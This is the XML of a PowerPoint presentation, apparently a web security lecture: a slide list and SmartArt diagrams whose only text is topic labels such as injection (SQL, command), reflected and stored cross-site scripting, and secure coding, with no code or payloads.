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319" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="321" r:id="rId5"/>
    <p:sldId id="320" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="297" r:id="rId12"/>
    <p:sldId id="298" r:id="rId13"/>
    <p:sldId id="260" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="307" r:id="rId16"/>
    <p:sldId id="308" r:id="rId17"/>
    <p:sldId id="322" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="299" r:id="rId20"/>
    <p:sldId id="273" r:id="rId21"/>
    <p:sldId id="274" r:id="rId22"/>
    <p:sldId id="264" r:id="rId23"/>
    <p:sldId id="265" r:id="rId24"/>
    <p:sldId id="323" r:id="rId25"/>
    <p:sldId id="300" r:id="rId26"/>
    <p:sldId id="301" r:id="rId27"/>
    <p:sldId id="266" r:id="rId28"/>
    <p:sldId id="267" r:id="rId29"/>
    <p:sldId id="326" r:id="rId30"/>
    <p:sldId id="327" r:id="rId31"/>
    <p:sldId id="328" r:id="rId32"/>
    <p:sldId id="324" r:id="rId33"/>
    <p:sldId id="302" r:id="rId34"/>
    <p:sldId id="268" r:id="rId35"/>
    <p:sldId id="269" r:id="rId36"/>
    <p:sldId id="306" r:id="rId37"/>
    <p:sldId id="325" r:id="rId38"/>
    <p:sldId id="303" r:id="rId39"/>
    <p:sldId id="304" r:id="rId40"/>
    <p:sldId id="305" r:id="rId41"/>
    <p:sldId id="276" r:id="rId42"/>
    <p:sldId id="275" r:id="rId43"/>
    <p:sldId id="283" r:id="rId44"/>
    <p:sldId id="309" r:id="rId45"/>
    <p:sldId id="311" r:id="rId46"/>
    <p:sldId id="312" r:id="rId47"/>
    <p:sldId id="313" r:id="rId48"/>
    <p:sldId id="284" r:id="rId49"/>
    <p:sldId id="288" r:id="rId50"/>
    <p:sldId id="290" r:id="rId51"/>
    <p:sldId id="291" r:id="rId52"/>
    <p:sldId id="292" r:id="rId53"/>
    <p:sldId id="293" r:id="rId54"/>
    <p:sldId id="294" r:id="rId55"/>
    <p:sldId id="316" r:id="rId56"/>
    <p:sldId id="317" r:id="rId57"/>
    <p:sldId id="295" r:id="rId58"/>
    <p:sldId id="318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6108" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-19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FD771-BDA3-414B-85EB-23B3B0A28DBA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B2B317-ADDB-4CC3-B960-F1F7A2BF36E3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Web Security Introduction</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0483F8E7-E3AD-4E33-8DFD-7A47F65EE360}" type="parTrans" cxnId="{97CD3F9D-058A-4C8E-A74A-72C0B2E13EB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17EB19DD-9F28-45D6-8186-614D3EABEF25}" type="sibTrans" cxnId="{97CD3F9D-058A-4C8E-A74A-72C0B2E13EB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87007A1E-9C88-4A56-B06A-0BEF66682A2E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC8C23C8-890A-42E0-973B-2387C728A8A0}" type="parTrans" cxnId="{6C0A2BCC-FD60-414D-A124-CD432BE9276F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F97B4B2C-D619-4588-A2F2-0B6E5FC451A9}" type="sibTrans" cxnId="{6C0A2BCC-FD60-414D-A124-CD432BE9276F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4898927B-A766-4DA6-8DA1-72248EBFF845}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Common Web Attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{140DACF9-11E0-4BC0-8212-E8F35A1C0243}" type="parTrans" cxnId="{D1B85117-BC09-4110-A614-C4A629D4E07C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44B88BA3-2DC8-4058-9768-3F08D7A5D176}" type="sibTrans" cxnId="{D1B85117-BC09-4110-A614-C4A629D4E07C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D064A71-1F0E-46A1-991E-C0CB7B6A54E3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB65516A-37D9-4F9A-972B-EB9130C1B395}" type="parTrans" cxnId="{4B694BC2-29EA-4841-85F2-2A68FAC1EC40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAB8FD86-7E6E-430B-A059-B5D41D99F55C}" type="sibTrans" cxnId="{4B694BC2-29EA-4841-85F2-2A68FAC1EC40}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Secure Coding</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEC400A4-EAC4-478D-AAD5-55A9B76B0A35}" type="parTrans" cxnId="{8C4577D2-561F-4857-9DBA-8BC772621FBB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C790E316-0CE1-47B7-BB1A-0735EEDEC67C}" type="sibTrans" cxnId="{8C4577D2-561F-4857-9DBA-8BC772621FBB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEA12CD5-5B0B-4A9B-98FF-EA9546BCB597}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1C3FDE1-3560-47E2-A314-9F3E88FFB3AD}" type="parTrans" cxnId="{139B154F-57CC-4328-A38C-B39BFDFC166C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27E42F0B-B2EB-40F1-94B0-9B99D7370143}" type="sibTrans" cxnId="{139B154F-57CC-4328-A38C-B39BFDFC166C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" type="pres">
      <dgm:prSet presAssocID="{2CEFD771-BDA3-414B-85EB-23B3B0A28DB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083DFCF-0078-425E-805E-1DAEAD856EB5}" type="pres">
      <dgm:prSet presAssocID="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E3}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2623E3BC-3818-40BF-B2E3-3B34DB6A894D}" type="pres">
      <dgm:prSet presAssocID="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E3}" presName="bentUpArrow1" presStyleLbl="alignImgPlace1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA715CE1-7861-412E-8BD2-CABC72705C39}" type="pres">
      <dgm:prSet presAssocID="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E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48B7E-DBFC-49B2-86E0-49F07C3A543E}" type="pres">
      <dgm:prSet presAssocID="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E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7481E-F991-40C6-865B-6A78F430F3B0}" type="pres">
      <dgm:prSet presAssocID="{17EB19DD-9F28-45D6-8186-614D3EABEF25}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{587B26CA-7493-45AF-9565-F5C4B9B0551D}" type="pres">
      <dgm:prSet presAssocID="{4898927B-A766-4DA6-8DA1-72248EBFF845}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99A9B830-6F31-4E30-9A88-7F5A9F15ABE6}" type="pres">
      <dgm:prSet presAssocID="{4898927B-A766-4DA6-8DA1-72248EBFF845}" presName="bentUpArrow1" presStyleLbl="alignImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BA35732-6586-41C8-8FF4-81ECA2731828}" type="pres">
      <dgm:prSet presAssocID="{4898927B-A766-4DA6-8DA1-72248EBFF84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580F1-B45A-4D66-AFF1-94134E6DCF61}" type="pres">
      <dgm:prSet presAssocID="{4898927B-A766-4DA6-8DA1-72248EBFF84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E4181-DA0F-463D-9BBB-28BD83FD8DE3}" type="pres">
      <dgm:prSet presAssocID="{44B88BA3-2DC8-4058-9768-3F08D7A5D176}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99B13A4D-D314-4F36-BD42-A8FFCD92A202}" type="pres">
      <dgm:prSet presAssocID="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC6}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3D024DA-7915-41C1-861E-840C3C4487C0}" type="pres">
      <dgm:prSet presAssocID="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC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F05D5-0EC6-4D7B-9536-439E7FD70D0C}" type="pres">
      <dgm:prSet presAssocID="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC6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B85117-BC09-4110-A614-C4A629D4E07C}" srcId="{2CEFD771-BDA3-414B-85EB-23B3B0A28DBA}" destId="{4898927B-A766-4DA6-8DA1-72248EBFF845}" srcOrd="1" destOrd="0" parTransId="{140DACF9-11E0-4BC0-8212-E8F35A1C0243}" sibTransId="{44B88BA3-2DC8-4058-9768-3F08D7A5D176}"/>
    <dgm:cxn modelId="{6170646E-A859-41CC-9E0B-EC596E667359}" type="presOf" srcId="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E3}" destId="{FA715CE1-7861-412E-8BD2-CABC72705C39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{06B229F9-ED74-4BD7-9F20-65C414B36788}" type="presOf" srcId="{87007A1E-9C88-4A56-B06A-0BEF66682A2E}" destId="{77E48B7E-DBFC-49B2-86E0-49F07C3A543E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{FF8CA00B-64C7-42CE-8682-CFF0F313AB0E}" type="presOf" srcId="{4898927B-A766-4DA6-8DA1-72248EBFF845}" destId="{8BA35732-6586-41C8-8FF4-81ECA2731828}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{6C0A2BCC-FD60-414D-A124-CD432BE9276F}" srcId="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E3}" destId="{87007A1E-9C88-4A56-B06A-0BEF66682A2E}" srcOrd="0" destOrd="0" parTransId="{BC8C23C8-890A-42E0-973B-2387C728A8A0}" sibTransId="{F97B4B2C-D619-4588-A2F2-0B6E5FC451A9}"/>
    <dgm:cxn modelId="{A9C4E5EC-1C1D-4973-8173-9590B6A8BEF5}" type="presOf" srcId="{9D064A71-1F0E-46A1-991E-C0CB7B6A54E3}" destId="{9C0580F1-B45A-4D66-AFF1-94134E6DCF61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{155D1424-6549-490C-81A5-7B473DDEB147}" type="presOf" srcId="{2CEFD771-BDA3-414B-85EB-23B3B0A28DBA}" destId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{97CD3F9D-058A-4C8E-A74A-72C0B2E13EB3}" srcId="{2CEFD771-BDA3-414B-85EB-23B3B0A28DBA}" destId="{04B2B317-ADDB-4CC3-B960-F1F7A2BF36E3}" srcOrd="0" destOrd="0" parTransId="{0483F8E7-E3AD-4E33-8DFD-7A47F65EE360}" sibTransId="{17EB19DD-9F28-45D6-8186-614D3EABEF25}"/>
    <dgm:cxn modelId="{8C4577D2-561F-4857-9DBA-8BC772621FBB}" srcId="{2CEFD771-BDA3-414B-85EB-23B3B0A28DBA}" destId="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC6}" srcOrd="2" destOrd="0" parTransId="{CEC400A4-EAC4-478D-AAD5-55A9B76B0A35}" sibTransId="{C790E316-0CE1-47B7-BB1A-0735EEDEC67C}"/>
    <dgm:cxn modelId="{139B154F-57CC-4328-A38C-B39BFDFC166C}" srcId="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC6}" destId="{EEA12CD5-5B0B-4A9B-98FF-EA9546BCB597}" srcOrd="0" destOrd="0" parTransId="{A1C3FDE1-3560-47E2-A314-9F3E88FFB3AD}" sibTransId="{27E42F0B-B2EB-40F1-94B0-9B99D7370143}"/>
    <dgm:cxn modelId="{21C39CDA-15E6-4159-8441-1BB771EA5930}" type="presOf" srcId="{830B0DD6-EC5F-4541-BA07-B9B4524D0BC6}" destId="{A3D024DA-7915-41C1-861E-840C3C4487C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{4B694BC2-29EA-4841-85F2-2A68FAC1EC40}" srcId="{4898927B-A766-4DA6-8DA1-72248EBFF845}" destId="{9D064A71-1F0E-46A1-991E-C0CB7B6A54E3}" srcOrd="0" destOrd="0" parTransId="{AB65516A-37D9-4F9A-972B-EB9130C1B395}" sibTransId="{EAB8FD86-7E6E-430B-A059-B5D41D99F55C}"/>
    <dgm:cxn modelId="{A6D0C920-D267-4EF3-8E53-EFCBB891720E}" type="presOf" srcId="{EEA12CD5-5B0B-4A9B-98FF-EA9546BCB597}" destId="{D61F05D5-0EC6-4D7B-9536-439E7FD70D0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{21361C8B-B76B-4754-BB37-90B3D6836D4C}" type="presParOf" srcId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" destId="{E083DFCF-0078-425E-805E-1DAEAD856EB5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{F0F17A2F-C8D0-4755-A901-BFFC54DB1758}" type="presParOf" srcId="{E083DFCF-0078-425E-805E-1DAEAD856EB5}" destId="{2623E3BC-3818-40BF-B2E3-3B34DB6A894D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{F226BD83-F296-4434-B393-44C18C05A22B}" type="presParOf" srcId="{E083DFCF-0078-425E-805E-1DAEAD856EB5}" destId="{FA715CE1-7861-412E-8BD2-CABC72705C39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{AF674429-AA9C-464A-B1B6-1D8032710432}" type="presParOf" srcId="{E083DFCF-0078-425E-805E-1DAEAD856EB5}" destId="{77E48B7E-DBFC-49B2-86E0-49F07C3A543E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{1D866AFE-4A7F-44D6-B8F4-8C410F87559E}" type="presParOf" srcId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" destId="{0B87481E-F991-40C6-865B-6A78F430F3B0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{363AE6E7-788E-42B5-B000-09FE8DDB41C1}" type="presParOf" srcId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" destId="{587B26CA-7493-45AF-9565-F5C4B9B0551D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{7785163E-7ED4-44EF-819D-A295972140F0}" type="presParOf" srcId="{587B26CA-7493-45AF-9565-F5C4B9B0551D}" destId="{99A9B830-6F31-4E30-9A88-7F5A9F15ABE6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{FA13BD11-38A4-4D52-A82D-661238567470}" type="presParOf" srcId="{587B26CA-7493-45AF-9565-F5C4B9B0551D}" destId="{8BA35732-6586-41C8-8FF4-81ECA2731828}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{3FF985FA-1E49-45DE-939E-9F9A1A8333A0}" type="presParOf" srcId="{587B26CA-7493-45AF-9565-F5C4B9B0551D}" destId="{9C0580F1-B45A-4D66-AFF1-94134E6DCF61}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{625818BD-428D-4E24-AE52-CC24E03EECB8}" type="presParOf" srcId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" destId="{877E4181-DA0F-463D-9BBB-28BD83FD8DE3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{E125949B-F4ED-4A4D-9EB1-10BC3F513DB5}" type="presParOf" srcId="{41A73E63-5E08-40CD-98AA-C40B1C857BA5}" destId="{99B13A4D-D314-4F36-BD42-A8FFCD92A202}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{2587B280-D8FF-44E1-8ED6-B4B0907F3C6B}" type="presParOf" srcId="{99B13A4D-D314-4F36-BD42-A8FFCD92A202}" destId="{A3D024DA-7915-41C1-861E-840C3C4487C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{9BC59A80-B28E-451D-8330-DC7B0D150EAE}" type="presParOf" srcId="{99B13A4D-D314-4F36-BD42-A8FFCD92A202}" destId="{D61F05D5-0EC6-4D7B-9536-439E7FD70D0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39C797-9C55-4EAC-9F7C-E35CE1DF07C8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9A80A0-12F0-40A2-B04D-8EB76FCBF56A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C7EFDB0-3AB2-4279-9844-D150F72AAB5F}" type="parTrans" cxnId="{73951FFC-5696-47F8-9F9E-4B9B18316FED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B32220B5-13D9-469D-97C2-6DA859588A78}" type="sibTrans" cxnId="{73951FFC-5696-47F8-9F9E-4B9B18316FED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AD0BE5D-F6ED-4018-AE6A-D145F496562A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90B159A3-EB4B-450D-8FE9-1E41E3E2E604}" type="parTrans" cxnId="{98D9CA0A-9736-4082-9938-81AD34E2111D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E8FECF4-5987-4970-82A6-E53A9BE55874}" type="sibTrans" cxnId="{98D9CA0A-9736-4082-9938-81AD34E2111D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29939D68-164B-4A1D-96C6-2D051E0BBDAA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Command</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC6420CF-808D-4EDC-A704-AC1D8FBC3E17}" type="parTrans" cxnId="{505053B1-1162-4F4B-A573-0A48416DB2E1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD47A654-0B55-4799-8BBF-7B120FFC14E2}" type="sibTrans" cxnId="{505053B1-1162-4F4B-A573-0A48416DB2E1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72416F9E-0856-4A7B-A0F4-C086BF351066}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Cross Site Scripting</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{370C9755-10B2-45B8-B524-4ECDCC333815}" type="parTrans" cxnId="{56FF29FB-FBA4-4C0D-B9DE-A370704D7099}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8723763-E233-4ADD-81D8-0D34B6C2EE16}" type="sibTrans" cxnId="{56FF29FB-FBA4-4C0D-B9DE-A370704D7099}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F59C3EE-B3F8-4609-8669-1027036D81EF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Reflected</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F391D31D-9679-465A-8A36-A90838C73341}" type="parTrans" cxnId="{8A8A49F3-AB17-4C21-8CDD-F427A93D53B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DFB6CC8-9FCB-4D45-838A-820690BA1760}" type="sibTrans" cxnId="{8A8A49F3-AB17-4C21-8CDD-F427A93D53B6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EEE45F9-04B1-4DAA-A29C-2C2AD1CC043F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Stored</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{220E3B14-43BF-42AE-94A4-658DDF207E28}" type="parTrans" cxnId="{558E244A-0618-44D2-8048-11D9DF7474E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB9C8548-AFB1-46D5-B0DB-139E91D814ED}" type="sibTrans" cxnId="{558E244A-0618-44D2-8048-11D9DF7474E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E6D50CA-38FB-49A9-B3BF-A33C87B430FF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/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33F27572-C2A1-4FA1-A10B-7E5C86E3186C}" type="parTrans" cxnId="{6C960F3B-3C47-445C-B28B-C483C620AD7B}">
      <dgm:prSet/>
